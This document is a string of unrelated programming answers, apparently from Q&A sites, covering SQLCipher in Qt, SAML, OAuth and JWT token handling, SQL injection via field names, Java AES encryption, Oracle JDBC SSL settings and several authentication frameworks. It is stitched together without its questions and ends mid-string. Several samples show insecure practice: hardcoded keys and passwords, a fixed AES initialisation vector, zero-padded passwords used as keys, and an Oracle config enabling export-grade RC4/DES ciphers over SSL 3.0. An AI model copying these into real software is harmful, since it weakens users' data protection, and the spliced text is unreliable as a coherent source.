int main(int argc, char *argv[])
{
    QCoreApplication a(argc, argv);
    qDebug() << QSqlDatabase::drivers();
    QSqlDatabase db = QSqlDatabase::addDatabase("QSQLCIPHER");
    db.setDatabaseName("C:/sqlcipher/encrypted.db");
    db.open();
    QSqlQuery q;
    q.exec("PRAGMA key = 'testkey';");
    q.exec("insert into testtable (id,name) values(4,'dummy')");
    q.exec("SELECT id,name anz FROM testtable");
    while (q.next()) {
        QString id = q.value(0).toString();
        QString name = q.value(1).toString();
        qDebug() << "id=" << id << ", name=" << name;
    }
    db.close();
    return 0;
}

Compile and execute:

("QSQLCIPHER", "QSQLITE", "QMYSQL", "QMYSQL3", "QODBC", "QODBC3", "QPSQL", "QPSQL7")
id= "1" , name= "Bob"
id= "2" , name= "Charlie"
id= "3" , name= "Daphne"
id= "4" , name= "dummy"

When delivering a Qt program, do not forget the Qt libraries, the platform libraries, the SQL-driver-plugin 'qsqlcipher.dll' and the OpenSSL library 'libeay32.dll'. Example for the test program above:

C:\TEMP\QSQLCIPHER-TEST
|   icudt53.dll
|   icuin53.dll
|   icuuc53.dll
|   libeay32.dll
|   libgcc_s_dw2-1.dll
|   libstdc++-6.dll
|   libwinpthread-1.dll
|   qsqlcipher.exe
|   Qt5Core.dll
|   Qt5Sql.dll
|
+---platforms
|       qminimal.dll
|       qoffscreen.dll
|       qwindows.dll
|
\---sqldrivers
        qsqlcipher.dll

Caution: The test program contains the key:

...
q.exec("PRAGMA key = 'testkey';");
...

This key string can easily be read from the binary of the test program using a hex editor, which is, in my opinion, a security weakness:

...
00002C90  70 68 65 72 2F 65 6E 63 72 79 70 74 65 64 2E 64  pher/encrypted.d
00002CA0  62 00 50 52 41 47 4D 41 20 6B 65 79 20 3D 20 27  b.PRAGMA key = '
00002CB0  74 65 73 74 6B 65 79 27 3B 00 00 00 69 6E 73 65  testkey';...inse
00002CC0  72 74 20 69 6E 74 6F 20 74 65 73 74 74 61 62 6C  rt into testtabl
...

For approaches to solving this problem, ask the search engine of your own choice. ;-) E.g. search for: hide string in executable
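To make the idea behind "hide string in executable" concrete, here is a minimal sketch (not from the answer above; the mask value and function names are my own choices for illustration). Instead of embedding the key literal, you embed an XOR-obfuscated byte string and rebuild the key at runtime. Note this only defeats a naive hex-editor or strings search; a determined attacker can still recover the key from the binary or from process memory:

```python
# Sketch: store the PRAGMA key XOR-obfuscated so the literal "testkey"
# never appears in the compiled binary. This is obfuscation, not security.

OBFUSCATION_MASK = 0x5A  # arbitrary mask, an assumption for this sketch

def obfuscate(plaintext: str) -> bytes:
    """What you'd run once, at build time, to produce the embedded blob."""
    return bytes(b ^ OBFUSCATION_MASK for b in plaintext.encode())

def deobfuscate(blob: bytes) -> str:
    """What the program runs at startup to rebuild the key."""
    return bytes(b ^ OBFUSCATION_MASK for b in blob).decode()

# This byte string is what would be embedded in the source instead of
# the literal key:
EMBEDDED = obfuscate("testkey")
```

A hex dump of a binary containing EMBEDDED would show the masked bytes rather than the ASCII of "testkey".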
Both projects are compatible with Shibboleth. pysaml2 is older than python3-saml; right now both support Python 2 and Python 3. Both are reasonably active and documented. python3-saml follows the structure of OneLogin's SAML toolkits, so if you have used any of the other toolkits before (php-saml, ruby-saml, java-saml), it will be easy for you to work with (similar methods, same settings).

Differences

Crypto: pysaml2 uses pycryptodome as a dependency to handle cryptography and implements its own xmldsig and xmlenc classes (to manipulate signatures and encryption on XMLs). python3-saml uses python-xmlsec as a dependency and delegates the signature/encryption of XML elements to it.

Functionality: pysaml2 lets you deploy an Identity Provider or a Service Provider. python3-saml is focused on the Service Provider.

Settings: In my opinion, python3-saml is easier than pysaml2; its settings are more precise, and its repo contains code examples on how to integrate a Django or a Flask app, plus a guide in the docs.

Note: I'm the author of python3-saml
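For a feel of what the python3-saml settings look like, here is an abbreviated sketch of its settings.json layout (all URLs and entity IDs below are placeholders; the field names follow python3-saml's documented settings structure):

```json
{
  "strict": true,
  "debug": false,
  "sp": {
    "entityId": "https://myapp.example.com/metadata/",
    "assertionConsumerService": {
      "url": "https://myapp.example.com/?acs",
      "binding": "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
    },
    "NameIDFormat": "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified",
    "x509cert": "",
    "privateKey": ""
  },
  "idp": {
    "entityId": "https://idp.example.com/metadata",
    "singleSignOnService": {
      "url": "https://idp.example.com/sso",
      "binding": "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect"
    },
    "x509cert": "...IdP public certificate here..."
  }
}
```

The same file carries both SP and IdP metadata, which is what makes the settings feel more precise than pysaml2's Python-dict configuration.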
The answer to your question:

Does this mean that the refresh_token will be indefinitely valid or does it expire?

...can be concluded from section 1.5 and section 10.4 of the OAuth 2.0 specification.

Section 1.5 (introduction of the refresh_token) states:

Refresh tokens are issued to the client by the authorization server and are used to obtain a new access token when the current access token becomes invalid or expires, or to obtain additional access tokens with identical or narrower scope (access tokens may have a shorter lifetime and fewer permissions than authorized by the resource owner)

Section 10.4 (security considerations for the refresh_token) states:

The authorization server MUST verify the binding between the refresh token and client identity whenever the client identity can be authenticated. When client authentication is not possible, the authorization server SHOULD deploy other means to detect refresh token abuse. For example, the authorization server could employ refresh token rotation in which a new refresh token is issued with every access token refresh response. The previous refresh token is invalidated but retained by the authorization server. If a refresh token is compromised and subsequently used by both the attacker and the legitimate client, one of them will present an invalidated refresh token, which will inform the authorization server of the breach.

It can be concluded that:

if the authorization server is able to verify the binding between a refresh_token and the client to whom it was issued, then the refresh_token can be used to obtain multiple access_tokens and will never expire;

else, the authorization server will invalidate the old refresh_token and generate a new refresh_token with every access token refresh response.
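The rotation scheme from section 10.4 can be sketched in a few lines. This is a toy model, not any particular server's implementation: every refresh retires the old token and issues a new one, and a replay of a retired token is treated as evidence of compromise:

```python
import secrets

class AuthorizationServer:
    """Toy model of refresh-token rotation (OAuth 2.0, section 10.4).

    Every refresh retires the presented token and issues a fresh one.
    If a retired token is ever presented again, either an attacker or
    the legitimate client replayed it, so the whole grant is revoked.
    """

    def __init__(self):
        self.active = set()    # refresh tokens that may still be used
        self.retired = set()   # tokens already exchanged once

    def issue_refresh_token(self) -> str:
        token = secrets.token_urlsafe(16)
        self.active.add(token)
        return token

    def refresh(self, token: str) -> str:
        if token in self.retired:
            # Reuse of an invalidated token detected -> revoke everything
            # issued for this grant, as the spec suggests.
            self.active.clear()
            raise PermissionError("refresh token reuse detected")
        if token not in self.active:
            raise PermissionError("unknown refresh token")
        self.active.discard(token)
        self.retired.add(token)
        return self.issue_refresh_token()
```

As long as the client keeps exchanging tokens normally the chain never expires; the rotation exists so that a leaked token is eventually detected and the grant revoked.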
In general the easiest answer would be to say that you cannot revoke a JWT token, but that's simply not true. The honest answer is that the cost of supporting JWT revocation is big enough that most of the time it isn't worth it, or it's worth plainly reconsidering an alternative to JWT. Having said that, in some scenarios you might need both JWT and immediate token revocation, so let's go through what it would take; but first we'll cover some concepts.

JWT (Learn JSON Web Tokens) just specifies a token format; this revocation problem would also apply to any format used in what's usually known as a self-contained or by-value token. I like the latter terminology, because it makes a good contrast with by-reference tokens.

by-value token - associated information, including token lifetime, is contained in the token itself and the information can be verified as originating from a trusted source (digital signatures to the rescue)

by-reference token - associated information is kept on server-side storage that is then obtained using the token value as the key; being server-side storage, the associated information is implicitly trusted

Before the JWT Big Bang we already dealt with tokens in our authentication systems; it was common for an application to create a session identifier upon user login that would then be used so that the user did not have to repeat the login process each time. These session identifiers were used as key indexes for server-side storage, and if this sounds similar to something you recently read, you're right: this indeed classifies as a by-reference token.

Using the same analogy, understanding revocation for by-reference tokens is trivial; we just delete the server-side storage mapped to that key and the next time the key is provided it will be invalid. For by-value tokens we just need to implement the opposite.
When you request the revocation of the token, you store something that allows you to uniquely identify that token, so that the next time you receive it you can additionally check if it was revoked. If you're already thinking that something like this will not scale, have in mind that you only need to store the data until the time the token would expire, and in most cases you could probably just store a hash of the token, so it would always be something of a known size.

As a last note, and to center this on OAuth 2.0: the revocation of by-value access tokens is currently not standardized. Nonetheless, the OAuth 2.0 Token Revocation specification specifically states that it can still be achieved, as long as both the authorization server and the resource server agree to a custom way of handling this:

In the former case (self-contained tokens), some (currently non-standardized) backend interaction between the authorization server and the resource server may be used when immediate access token revocation is desired.

If you control both the authorization server and resource server this is very easy to achieve. On the other hand, if you delegate the authorization server role to a cloud provider like Auth0 or a third-party component like Spring OAuth 2.0, you most likely need to approach things differently, as you'll probably only get what's already standardized.

An interesting reference

This article explains another way to do that: Blacklist JWT. It contains some interesting practices and patterns followed by RFC 7523.
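The "store a hash until the token would expire" idea above can be sketched as follows (a minimal illustration, not a production store; names are my own):

```python
import hashlib
import time

class RevocationList:
    """Sketch of revocation for by-value tokens: keep only a hash of each
    revoked token, and only until that token's own expiry time, so the
    server-side store stays bounded."""

    def __init__(self):
        self._revoked = {}  # sha256 hex digest -> token expiry (unix time)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def revoke(self, token, expires_at):
        self._revoked[self._digest(token)] = expires_at

    def is_revoked(self, token, now=None):
        now = time.time() if now is None else now
        # Drop entries for tokens that would have expired anyway; their
        # signature check would reject them regardless.
        self._revoked = {h: exp for h, exp in self._revoked.items() if exp > now}
        return self._digest(token) in self._revoked
```

Every resource server then checks `is_revoked` in addition to verifying the token signature, which is exactly the extra server-side lookup that by-value tokens were supposed to avoid; that trade-off is the cost of revocation.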
First of all, a domain controller is a server hosting Active Directory (a kind of organizational database). Active Directory identifies every component/resource connected to the domain, whether logical (users) or physical (computers and printers), as an object. An object's properties are defined by the schema. Objects are catalogued in a repository known as the GC (Global Catalog), but the GC holds only partial information, just enough for resources to be located.

Now, coming to policies, there are two things: GPOs and OUs. A GPO is a set of policies that you can apply to an OU (organizational unit) or a higher grouping unit.

Let's see how communication happens. Again, there are two widely used mechanisms: 1. replication and 2. LDAP queries. Replication is done between controllers so that network traffic is reduced and resources connected to the server stay highly available. In replication, all resource information is synchronized between servers. To ensure security and integrity, there are certificates (which provide identification as well as an encryption mechanism) and delegation (granting of rights). LDAP is the protocol through which a user is authenticated. LDAP has a query syntax quite similar to other query languages, and all these queries are ultimately logged at the server. GPOs are replicated to resources automatically, or you can apply them forcibly if you want it done immediately.
I'm sharing you my precious Encryption class my english friend. package Encriptacion; import javax.crypto.*; import java.io.*; import java.nio.*; import java.nio.channels.*; import javax.crypto.spec.*; public class EncriptadorAES { private SecretKey CLAVESECRETA=null; private final int AES_KEYLENGTH = 128; private IvParameterSpec IV=null; public EncriptadorAES() throws Exception{ //generarIV(); if(new File("initvectoraes.iv").exists()){ this.IV=new IvParameterSpec(obtenerIV()); } } public void setCLAVESECRETA(String clave){ this.CLAVESECRETA=generarClaveSecreta(clave); } public void guardarClave(String clave,String ruta)throws Exception{ try{ byte[]bytesClave=generarClaveSecreta(clave).getEncoded(); FileChannel canalSalida=new RandomAccessFile(new File(ruta), "rw").getChannel(); ByteBuffer bufferSalida=ByteBuffer.wrap(bytesClave); canalSalida.write(bufferSalida); canalSalida.close(); }catch(Exception ex){ throw new Exception("No se pudo guardar la clave\n"+ex); } } public SecretKey cargarClave(String ruta)throws Exception{ try{ File archivo=new File(ruta); byte[]bytesClave=new byte[(int)archivo.length()]; FileChannel canalEntrada=new RandomAccessFile(archivo, "r").getChannel(); ByteBuffer bufferEntrada=ByteBuffer.allocate(bytesClave.length); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesClave); canalEntrada.close(); return new SecretKeySpec(bytesClave, "AES"); }catch(Exception ex){ throw new Exception("No se pudo cargar la clave secreta\n"+ex); } } public void encriptarArchivo(String ruta,SecretKey clave) throws Exception{ File archivo=null; try { archivo=new File(ruta); if(archivo.isFile()&&archivo.exists()&&archivo.length()<=700248752){ //LECTURA byte[] bytesArchivo=new byte[(int)archivo.length()]; int tamañoBloque=AES_KEYLENGTH/8; int numBloques=((int)archivo.length()%tamañoBloque==0)?(int)archivo.length()/tamañoBloque:((int)archivo.length()/tamañoBloque)+1; int 
tamañoEncriptado=((bytesArchivo.length/tamañoBloque)+1)*tamañoBloque; FileChannel canalEntrada=new RandomAccessFile(archivo, "r").getChannel(); ByteBuffer bufferEntrada=ByteBuffer.allocate((int)archivo.length()); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesArchivo); canalEntrada.close(); //CIFRADO clave simétrica ByteBuffer bufferSalida=ByteBuffer.allocate(tamañoEncriptado); Cipher cifradorAES = Cipher.getInstance("AES/CBC/PKCS5Padding"); cifradorAES.init(Cipher.ENCRYPT_MODE, clave,this.IV); bufferSalida.put(cifradorAES.doFinal(bytesArchivo)); bufferSalida.flip(); //ESCRITURA if(archivo.delete()){ FileChannel canalSalida=new RandomAccessFile(archivo,"rw").getChannel(); canalSalida.write(bufferSalida); canalSalida.close(); }else throw new Exception("No se pudo borrar el archivo "+archivo.getName()+", si lo tiene abierto, ciérrelo."); }else{ if(!archivo.exists())throw new Exception("El archivo "+archivo.getName()+" no existe"); if(!archivo.isFile())throw new Exception("No puede encriptar un directorio, trate\nde comprimirlo antes para luego encriptar los archivos"); if(archivo.length()>700248752)throw new Exception("No se puede encriptar el archivo "+archivo.getName()+" porque ha superado el tamaño máximo\nde capacidad de memoria del JVM"); } } catch (Exception ex){ throw new Exception("Hubo un error al encriptar el archivo\n"+ archivo.getName() +"\n"+ex); } } public void desencriptarArchivo(String ruta,SecretKey clave)throws Exception{ File archivoEncriptado=null; try{ archivoEncriptado=new File(ruta); if(archivoEncriptado.exists()){ //LECTURA byte[]bytesArchivoEncriptado=new byte[(int)archivoEncriptado.length()]; int tamañoBloque=AES_KEYLENGTH/8; int numBloques=((int)archivoEncriptado.length()%tamañoBloque==0)?(int)archivoEncriptado.length()/tamañoBloque:((int)archivoEncriptado.length()/tamañoBloque)+1; FileChannel canalEntrada=new RandomAccessFile(archivoEncriptado, "r").getChannel(); ByteBuffer 
bufferEntrada=ByteBuffer.allocate((int)archivoEncriptado.length()); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesArchivoEncriptado); canalEntrada.close(); //DESCRIFRADO ByteBuffer bufferSalida=ByteBuffer.allocate((int)archivoEncriptado.length()); if(comprobarKeys(clave)){ Cipher descifradorAES = Cipher.getInstance("AES/CBC/PKCS5Padding"); descifradorAES.init(Cipher.DECRYPT_MODE,clave,this.IV); bufferSalida.put(descifradorAES.doFinal(bytesArchivoEncriptado)); bufferSalida.flip(); } else{ System.gc(); throw new Exception("La clave ingresada es incorrecta"); } //ESCRITURA if(archivoEncriptado.delete()){ FileChannel canalSalida=new RandomAccessFile(ruta, "rw").getChannel(); canalSalida.write(bufferSalida); canalSalida.close(); }else throw new Exception("No se pudo eliminar el archivo "+archivoEncriptado.getName()+", si lo tiene abierto, ciérrelo."); }else{ if(!archivoEncriptado.exists())throw new Exception("El archivo "+archivoEncriptado.getName()+" no existe"); } } catch (Exception ex){ System.gc(); throw new Exception("Hubo un error al desencriptar\n"+archivoEncriptado.getName()+":\n"+ex.getMessage()); } } public SecretKey generarClaveSecreta(String clave){ byte[]key=rellenarBytesClave(clave); SecretKey claveGenerada=new SecretKeySpec(key, "AES"); return claveGenerada; } private byte[] rellenarBytesClave(String clave){ byte[]key=clave.getBytes(); while(key.length!=AES_KEYLENGTH/8){ if(key.length<AES_KEYLENGTH/8){ clave+="0"; key=clave.getBytes(); } if(key.length>AES_KEYLENGTH/8){ clave=clave.substring(0,AES_KEYLENGTH/8); key=clave.getBytes(); } } return key; } private boolean comprobarKeys(SecretKey clave){ return this.CLAVESECRETA.equals(clave); } public void generarIV() throws Exception{ try{ byte[]VECTOR={1,6,1,2,1,9,9,7,7,9,9,1,2,1,6,1}; FileChannel canalsalida=new RandomAccessFile(new File("initvectoraes.iv"), "rw").getChannel(); MappedByteBuffer buffersalida=canalsalida.map(FileChannel.MapMode.READ_WRITE, 0, 16); 
buffersalida.put(VECTOR); buffersalida.force(); canalsalida.close(); }catch(Exception ex){ throw new Exception("Error al generar el Vector de Inicialización de AES\n"+ex.getMessage()); } } private byte[]obtenerIV()throws Exception{ byte[]vectorcargado=null; try{ FileChannel canalentrada=new RandomAccessFile(new File("initvectoraes.iv"), "r").getChannel(); MappedByteBuffer bufferentrada=canalentrada.map(FileChannel.MapMode.READ_ONLY, 0, 16); vectorcargado=new byte[16]; bufferentrada.get(vectorcargado); bufferentrada.load(); canalentrada.close(); } catch(Exception ex){ throw new Exception("Error al obtener el Vector de Inicialización de AES\n"+ex.getMessage()); } return vectorcargado; } } EDIT This code doesn't solve the problem but I think this could help in some way byte[] chave = "chave de 16bytes".getBytes(); IvParameterSpec IV = new IvParameterSpec(new byte[]{1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}); String TEST = "TEST"; public String encriptaAES(String chaveCriptografada) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, UnsupportedEncodingException, InvalidAlgorithmParameterException { try { Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); System.out.println("MENSAJE: "+chaveCriptografada); byte[] mensagem = chaveCriptografada.getBytes(); cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(chave, "AES"), this.IV); chaveCriptografada = new String(cipher.doFinal(mensagem)); System.out.println("Mensaje encriptado: "+chaveCriptografada); chaveCriptografada = DatatypeConverter.printBase64Binary(chaveCriptografada.getBytes()); this.TEST = DatatypeConverter.printBase64Binary(TEST.getBytes()); System.out.println("TEST: "+TEST); } catch (NoSuchAlgorithmException | NoSuchPaddingException e) { e.printStackTrace(); } return chaveCriptografada; } public String descriptografaAES(String chaveCriptografada) throws NoSuchAlgorithmException, NoSuchPaddingException, IllegalBlockSizeException, BadPaddingException, UnsupportedEncodingException, 
InvalidAlgorithmParameterException {
    Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    System.out.println("Mensaje Encriptado CON BASE 64: " + chaveCriptografada);
    byte[] base64decodedBytes = DatatypeConverter.parseBase64Binary(chaveCriptografada);
    this.TEST = new String(DatatypeConverter.parseBase64Binary(this.TEST));
    System.out.println("TEST: " + TEST);
    System.out.println("Mensaje Encriptado: " + new String(base64decodedBytes));
    try {
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.chave, "AES"), this.IV);
        byte[] decrypted = cipher.doFinal(base64decodedBytes);
        chaveCriptografada = new String(decrypted);
    } catch (InvalidKeyException e) {
        e.printStackTrace();
    }
    return chaveCriptografada;
}

public static void main(String[] args) throws Exception {
    AESCipher cipher = new AESCipher();
    String mensajeEncriptado = cipher.encriptaAES("mensaje");
    System.out.println("Mensaje encriptado CON BASE 64: " + mensajeEncriptado);
    System.out.println("Mensaje desencriptado: " + cipher.descriptografaAES(mensajeEncriptado));
}
$key=$this->escape($key);

A clear vulnerability is here. mysqli_real_escape_string escapes for SQL string syntax. Field names aren't using string syntax.

A simple example of what string escaping means:

$value = "Craig O'Connor";
$query = "INSERT INTO ... VALUES ('$value')";
                                  'Craig O'Connor' -> syntax error

With escaping:

$value = "Craig O'Connor";
$value = mysqli_real_escape_string($con, $value);
$query = "INSERT INTO ... VALUES ('$value')";
                                  'Craig O\'Connor'

The string escaping mechanism escaped the '. The assumption, the prerequisite, for mysqli_real_escape_string to do anything useful is that you're going to use the result in an SQL string literal. With field names you're not doing that. String escaping therefore doesn't do anything there, and therefore you're plainly vulnerable to SQL injection.

You must whitelist the allowable fields and filter them based on that whitelist. You cannot blindly accept any and all field names and simply use them as is. Not merely because it's somewhere between hard and impossible to escape field names, but also because the use of non-existing field names will result in a query error. You don't want query errors due to incorrect queries cobbled together from user input.

That is to say nothing about not using prepared statements in the first place, or that you're giving a user more or less free rein within your database…
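The whitelisting idea is language-independent; here is a minimal sketch of it in Python (the field names in ALLOWED_FIELDS and the table name are hypothetical, standing in for whatever your schema actually defines):

```python
# Identifiers (field/table names) cannot be made safe by string escaping,
# so validate them against a fixed whitelist. Values still belong in
# driver-handled placeholders, never interpolated into the query string.
ALLOWED_FIELDS = {"id", "name", "email"}  # hypothetical schema

def build_select(fields, table="users"):
    """Build a SELECT for the given fields, rejecting unknown names."""
    for field in fields:
        if field not in ALLOWED_FIELDS:
            raise ValueError("field not allowed: %s" % field)
    return "SELECT {} FROM {}".format(", ".join(fields), table)
```

Rejecting unknown names outright (rather than trying to escape them) also rules out the query-error problem described above, since only fields that actually exist can ever reach the database.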
When you create the connection to your URL, you need to define some properties related to the SSL key material you are going to use. Example:

Properties props = new Properties();
props.setProperty("user", "root");
props.setProperty("password", "root");
props.setProperty("javax.net.ssl.trustStore", "D:\\truststore\\truststore.jks");
props.setProperty("javax.net.ssl.trustStoreType", "JKS");
props.setProperty("javax.net.ssl.trustStorePassword", "welcome123");
Connection conn = DriverManager.getConnection(url, props);
//your code

If you are using Hibernate:

<bean id="dataSource" class="oracle.jdbc.pool.OracleDataSource">
    <property name="URL" value="jdbc:oracle:thin:@//host:port/service_name"/>
    <property name="user" value="root"/>
    <property name="password" value="root"/>
    <property name="maxPoolSize" value="10"/>
    <property name="initialPoolSize" value="5"/>
    <property name="connectionProperties">
        <value>
            oracle.net.ssl_cipher_suites: (ssl_rsa_export_with_rc4_40_md5, ssl_rsa_export_with_des40_cbc_sha)
            oracle.net.ssl_client_authentication: false
            oracle.net.ssl_version: 3.0
            oracle.net.encryption_client: REJECTED
            oracle.net.crypto_checksum_client: REJECTED
        </value>
    </property>
</bean>

<bean id="sessionFactory" class="org.springframework.orm.hibernate3.annotation.AnnotationSessionFactoryBean">
    <property name="dataSource" ref="dataSource" />
    <!-- classes etc -->
</bean>
Maybe you can try to play with a login-required middleware: Django Login Required Middleware

settings.py:

LOGIN_URL = '/login/'
LOGIN_EXEMPT_URLS = (
    r'^about\.html$',
    r'^legal/',  # allow any URL under /legal/*
)
MIDDLEWARE_CLASSES = (
    # ...
    'python.path.to.LoginRequiredMiddleware',
)

LoginRequiredMiddleware:

from django.http import HttpResponseRedirect
from django.conf import settings
from re import compile

EXEMPT_URLS = [compile(settings.LOGIN_URL.lstrip('/'))]
if hasattr(settings, 'LOGIN_EXEMPT_URLS'):
    EXEMPT_URLS += [compile(expr) for expr in settings.LOGIN_EXEMPT_URLS]

class LoginRequiredMiddleware:
    """
    Middleware that requires a user to be authenticated to view any page
    other than LOGIN_URL. Exemptions to this requirement can optionally be
    specified in settings via a list of regular expressions in
    LOGIN_EXEMPT_URLS (which you can copy from your urls.py).

    Requires authentication middleware and template context processors to
    be loaded. You'll get an error if they aren't.
    """
    def process_request(self, request):
        assert hasattr(request, 'user'), "The Login Required middleware \
requires authentication middleware to be installed. Edit your \
MIDDLEWARE_CLASSES setting to insert \
'django.contrib.auth.middleware.AuthenticationMiddleware'. If that doesn't \
work, ensure your TEMPLATE_CONTEXT_PROCESSORS setting includes \
'django.core.context_processors.auth'."
        if not request.user.is_authenticated():
            path = request.path_info.lstrip('/')
            if not any(m.match(path) for m in EXEMPT_URLS):
                return HttpResponseRedirect(settings.LOGIN_URL)
Before anything else, check the time and timezone of your OAuth server's application server and your client's application server, if they run on two different machines.

I think your OAuth server configuration has some problems. The OAuth server itself is secured with Basic access authentication: https://en.wikipedia.org/wiki/Basic_access_authentication

It works with a token in the request headers: 'Authorization': Basic + Base64.encode(username + ':' + password). If you miss this token you can't access any endpoint on your OAuth server. Mine works fine; you can test it:

@Override
protected void configure(HttpSecurity http) throws Exception {
    // @formatter:off
    http.formLogin().loginPage("/login").permitAll()
        .and().requestMatchers().antMatchers("/login", "/oauth/authorize", "/oauth/confirm_access", "/fonts/**", "/css/**")
        .and().authorizeRequests().antMatchers("/fonts/**", "/css/**").anonymous().anyRequest().authenticated();
    // @formatter:on
}

And why have you disabled CSRF protection?
You don't need to log in to get the user info. Although I'm not sure the logging-in part works from a web service.

UserInfo user = UserController.GetUserByName(username);
if (user != null)
{
    string email = user.Email;
}
else
{
    //user not found
}

Or if you do want to log in for added security, you can do this:

string resultText = string.Empty;
UserLoginStatus loginStatus = new UserLoginStatus();
UserController.UserLogin(PortalId, username, password, null, PortalSettings.PortalName,
    DotNetNuke.Services.Authentication.AuthenticationLoginBase.GetIPAddress(),
    ref loginStatus, false);
switch (loginStatus)
{
    case UserLoginStatus.LOGIN_SUCCESS:
        resultText = "OK";
        break;
    case UserLoginStatus.LOGIN_FAILURE:
        resultText = "Failure";
        break;
    case UserLoginStatus.LOGIN_USERLOCKEDOUT:
        resultText = "Locked out";
        break;
    case UserLoginStatus.LOGIN_USERNOTAPPROVED:
        resultText = "Not approved";
        break;
    default:
        resultText = "Unknown error";
        break;
}
Give this a try. But you still need some basic knowledge about Laravel's multi-auth setup.

In config/auth.php add something like this to the guards array:

'customer' => [
    'driver' => 'session',
    'provider' => 'customers',
],

Then in the same file add this to the providers array:

'customers' => [
    'driver' => 'eloquent',
    'model' => App\Customer::class,
],

Then create a migration for the customers DB table (you can use Laravel's out-of-the-box migration for the users table).

Next is the Eloquent model App\Customer with these included:

use App\Scopes\AuthorizedScope;
use Illuminate\Foundation\Auth\User as Authenticatable;

These should let you use Laravel's Auth facade in your app with these most-used methods:

Auth::guard('customer')->attempt()
Auth::guard('customer')->check()
Auth::guard('customer')->logout()
Auth::guard('customer')->user()

Or use the auth middleware like this:

Route::get('customer/dashboard', function () {
    // Only authenticated users may enter...
})->middleware('auth:customer');

Also check out: https://laravel.com/docs/5.3/authentication#authenticating-users
Here is a code from the article that you referred to: package com.waveaccess.someproject.commons.service; import com.waveaccess.someproject.commons.config.Const; import com.waveaccess.someproject.commons.config.properties.SharePointProperties; import com.waveaccess.someproject.commons.service.exceptions.SharePointAuthenticationException; import com.waveaccess.someproject.commons.service.exceptions.SharePointSignInException; import com.google.common.base.Joiner; import org.apache.commons.collections.CollectionUtils; import org.apache.commons.lang3.StringUtils; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.cache.annotation.Cacheable; import org.springframework.http.HttpHeaders; import org.springframework.http.HttpMethod; import org.springframework.http.RequestEntity; import org.springframework.http.ResponseEntity; import org.springframework.stereotype.Service; import org.springframework.util.LinkedMultiValueMap; import org.springframework.util.MultiValueMap; import org.springframework.web.client.RestTemplate; import org.springframework.xml.transform.StringSource; import org.springframework.xml.xpath.XPathExpression; import org.w3c.dom.Document; import javax.xml.transform.Transformer; import javax.xml.transform.TransformerException; import javax.xml.transform.TransformerFactory; import javax.xml.transform.dom.DOMResult; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; import java.util.Calendar; import java.util.Date; import java.util.List; /** * @author Maksim Kanev */ @Service public class SharePointServiceCached { private static final Logger log = LoggerFactory.getLogger(SharePointServiceCached.class); @Autowired private RestTemplate restTemplate; @Autowired private SharePointProperties sharePointProperties; @Autowired private XPathExpression xPathExpression; 
@Cacheable(Const.CACHE_NAME_TOKEN) public String receiveSecurityToken(Long executionDateTime) throws TransformerException, URISyntaxException { RequestEntity<String> requestEntity = new RequestEntity<>(buildSecurityTokenRequestEnvelope(), HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/extSTS.srf")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); DOMResult result = new DOMResult(); Transformer transformer = TransformerFactory.newInstance().newTransformer(); transformer.transform(new StringSource(responseEntity.getBody()), result); Document definitionDocument = (Document) result.getNode(); String securityToken = xPathExpression.evaluateAsString(definitionDocument); if (StringUtils.isBlank(securityToken)) { throw new SharePointAuthenticationException("Unable to authenticate: empty token"); } log.debug("Microsoft Online respond with Token: {}", securityToken); return securityToken; } private String buildSecurityTokenRequestEnvelope() { String envelopeTemplate = "<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\" xmlns:u=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"> <s:Header> <a:Action s:mustUnderstand=\"1\">http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue</a:Action> <a:ReplyTo> <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address> </a:ReplyTo> <a:To s:mustUnderstand=\"1\">https://login.microsoftonline.com/extSTS.srf</a:To> <o:Security s:mustUnderstand=\"1\" xmlns:o=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"> <o:UsernameToken> <o:Username>%s</o:Username> <o:Password>%s</o:Password> </o:UsernameToken> </o:Security> </s:Header><s:Body><t:RequestSecurityToken xmlns:t=\"http://schemas.xmlsoap.org/ws/2005/02/trust\"><wsp:AppliesTo xmlns:wsp=\"http://schemas.xmlsoap.org/ws/2004/09/policy\"><a:EndpointReference><a:Address>" + 
